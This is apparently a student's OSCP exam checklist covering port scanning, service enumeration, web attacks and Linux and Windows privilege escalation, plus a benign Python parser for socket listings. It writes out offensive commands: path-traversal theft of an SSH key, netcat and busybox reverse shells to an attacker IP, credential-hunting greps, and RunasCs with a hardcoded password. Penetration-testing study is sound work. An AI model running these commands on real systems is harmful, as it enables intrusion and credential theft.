- [x] Scan all TCP Ports.
- `nmap $IP -Pn -n --open --min-rate 3000 -p-`
- `nmap $IP -sC -sV -p $PORTS`
- [x] Check UDP Ports
- `nmap $IP -sU --top-ports 10`
- [x] if `FTP`?
- `ftp $IP` and try `anonymous` login
- Always download ftp shares to your machine `wget -m ftp://$IP/$share`
- [ ] if `SSH`?
- if `private-key` is passphrase-protected: `ssh2john id_rsa > hash.txt`
- if you find an `id_rsa` key in a web app, use `curl` or `burp` to save it
- `curl --path-as-is http://$IP/../../../home/$USER/id_rsa -o id_rsa`
- `chmod 400 id_rsa`
- if you find an `id_rsa` key and it doesn't work for one user, try it with other users listed in `/etc/passwd`
- [x] if `SMTP`?
- [[SMTP 25]]
- [x] if `IMAP` or `POP3`?
- [[IMAP 143 993]]
- [[POP3 110 995]]
- Brute-force with [[Hydra]] using the usernames found via `SMTP`
- [x] if `DNS`?
- [[dig]]
- [[dnsenum]]
- [x] If `SMB`?
- [[SMB 139 445]]
- `smbclient -N -L //$IP`
- `smbmap -H $IP`
- Mount a share
- `sudo mount -t cifs -o 'user=Wook' //$IP/$Share /mnt/wook`
- `sudo mount -t cifs -o 'user=Wook,port=1445' //$IP/$Share /mnt/wook`
- `sudo umount /mnt/wook`
- [x] if `RPC`?
- [[RPC 135]]
- [[rpcclient]]
- [x] if `LDAP`?
- [x] if `SNMP` from UDP scan?
- [[onesixtyone]] - [[snmp-check]] - [[snmpwalk]] - [[braa]]
- [ ] if `HTTP`?
- Use `Burp Suite` and [[curl]]
- `View Page Source`
- `robots.txt`, `sitemap.xml`
- File/Directory busting - [[sec/OSCP Notes/02 Vulnerability Analysis/tools & concepts/gobuster|gobuster]]
- [[sec/OSCP Notes/03 Exploitation/Web Attacks/tools & concepts/File Upload|File Upload]]
- Inject the payload (e.g., in the `User-Agent` or `Referer` header)
- [[Local File Inclusion]]
- [[Remote File Inclusion]]
- For a `reverse shell`, always try the ports from the Nmap output first
- Then try 80 or 443
- [[Directory Traversal]]
- [[SQL Injection]]
- [ ] if `NFS`?
- [[NFS 111 2049]]
- [ ] if `MySQL`?
- [[MySQL 3306]]
- [ ] if `MSSQL`?
- [[MSSQL1433]]
- [ ] if `PostgreSQL`?
- [[Postgres 5432 5433 5437]]
- [[psql]]
- [ ] if `RDP`?
- if you know admin creds, run software with admin privileges.
- [ ] For unknown ports, interact with them using
- `telnet $IP $PORT`
- `nc -nv $IP $PORT`
- [ ] Enumerate web servers with all the relevant wordlists
- [ ] Do proper fingerprinting
- `nmap -sC -sV`
- `nmap --script vuln`
- `Wappalyzer`
- `Check CMS`
- `Check server headers`
- `nc -nvv`
- [ ] Check for public exploits on `Exploit-DB`, `searchsploit`, `Google`, `GitHub`
- `CVE-XXXX-XXXX site:github.com`
- Read the exploit code to find the attack vector it uses
- [ ] If a reverse shell via `nc` etc. does not connect, try `busybox`
- `busybox nc $IP $PORT -e /bin/bash`
- [ ] Stabilize TTY - [[Fully interactive TTY & Shells]]
- Try `Penelope`?
### Linux Privilege Escalation
- [ ] Run `linpeas` and, if possible, `LSE (Linux Smart Enumeration)`
- [ ] Manually check for Linux privesc vectors [[sec/OSCP Notes/04 Linux Privilege Escalation/overview|overview]]
- [ ] Quick Enum
```bash
sudo -l
sudo -V
# Kernel Exploits
uname -sr
uname -a
lsb_release -a
# check for creds
find / -type f -exec grep -i -I "pass\|cred\|key\|secret" {} /dev/null \;
grep -rni --color=always 'password\|secret\|key\|token' . 2>/dev/null
grep -rni 'password' . 2>/dev/null
grep -rni 'PRIVATE KEY' . 2>/dev/null
grep -Horn password /var/www
# SUID or SGID
find / -type f \( -perm -4000 -o -perm -2000 \) -ls 2>/dev/null
# find Non-empty directories
find . -type d ! -empty
# pspy tip: run it under timeout so the shell is not left stuck inside pspy
timeout 20 ./pspy64
# show ALL listening and established connections (netstat takes the same flags)
# -p (process info) needs root to show other users' sockets
ss -tunpa
# show ONLY listening sockets
ss -tulnp
ss -tuln
# Capabilities
getcap -r / 2>/dev/null
```
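Added example (not from these notes): a small Python parser for the `ss -tulnp` output above, run over a constructed sample, so that listeners bound to a wildcard address (the ones reachable from the network and therefore visible to the Nmap scan at the top of this checklist) can be separated from loopback-only services.

```python
import re
from dataclasses import dataclass

# Constructed sample of `ss -tulnp` output (not captured from any real host).
SAMPLE_SS = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp   UNCONN 0      0      127.0.0.53%lo:53  0.0.0.0:*         users:(("systemd-resolve",pid=612,fd=13))
tcp   LISTEN 0      128    0.0.0.0:22        0.0.0.0:*         users:(("sshd",pid=901,fd=3))
tcp   LISTEN 0      511    127.0.0.1:3306    0.0.0.0:*         users:(("mysqld",pid=1203,fd=21))
tcp   LISTEN 0      511    *:80              *:*               users:(("apache2",pid=1400,fd=4),("apache2",pid=1401,fd=4))
tcp   LISTEN 0      128    [::]:22           [::]:*            users:(("sshd",pid=901,fd=4))
tcp   LISTEN 0      100    0.0.0.0:4444      0.0.0.0:*
"""

WILDCARDS = {"0.0.0.0", "*", "[::]", "::"}          # bound on every interface
PROC_RE = re.compile(r'"([^"]+)",pid=(\d+)')         # first ("name",pid=N) in the Process column


@dataclass(frozen=True)
class Socket:
    proto: str
    addr: str
    port: int
    process: str   # "name/pid", or "?" when ss could not show the owner (needs root)
    exposed: bool  # True when bound to a wildcard address


def parse_ss(text):
    """Parse `ss -tulnp` output into Socket records (header line is skipped)."""
    socks = []
    for line in text.splitlines()[1:]:
        cols = line.split(None, 6)                  # Process column may be absent
        if len(cols) < 6:
            continue
        addr, port = cols[4].rsplit(":", 1)         # keeps [::] intact
        addr = addr.split("%", 1)[0]                # drop interface scope such as %lo
        m = PROC_RE.search(cols[6]) if len(cols) > 6 else None
        proc = f"{m.group(1)}/{m.group(2)}" if m else "?"
        socks.append(Socket(cols[0], addr, int(port), proc, addr in WILDCARDS))
    return socks


def exposed_ports(socks):
    """Sorted (proto, port) pairs that are listening on all interfaces."""
    return sorted({(s.proto, s.port) for s in socks if s.exposed})


if __name__ == "__main__":
    for s in parse_ss(SAMPLE_SS):
        print(f"{s.proto:4} {s.addr:>12}:{s.port:<5} {s.process:22} {'EXPOSED' if s.exposed else 'local'}")
```

Compare `exposed_ports()` with the `--open` port list from the Nmap scan: anything listed here but missing there is filtered somewhere in between.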
### Windows Privilege Escalation
- [ ] Run `whoami /all`
- [ ] Check `C:\` for any unusual files/folders
- [ ] Run [[PrivescCheck.ps1]]
- [ ] Run [[sec/OSCP Notes/05 Windows Privilege Escalation/tools & concepts/PowerUp.ps1|PowerUp.ps1]]
- [ ] Run [[winPEAS]]
- [ ] Manually check for Windows privesc vectors [[sec/OSCP Notes/05 Windows Privilege Escalation/overview|overview]]
- Check PowerShell History [[Hardcoded Sensitive Information]]
- Check `Recycle Bin`
- `whoami /user`
- `dir C:\$Recycle.Bin\<S-1-5...>`
- Find `proof.txt` with `dir /s /b proof.txt`
```powershell
Get-History
# PowerShell history of a user (set $User first; for the current user the same path is $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt)
type "C:\Users\$User\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
# Interesting files/folders
Get-ChildItem -Path C:\Users -Include *.txt,*.ini,*.pdf,*.kdbx,*.exe -Recurse -ErrorAction SilentlyContinue
# When using GodPotato, run commands as another user with RunasCs (e.g., to create a new admin user)
RunasCs.exe svc_mssql trustno1 "nc.exe 192.168.45.152 4444 -e cmd.exe"
RunasCs.exe administrator passwd cmd.exe -r $IP:80
```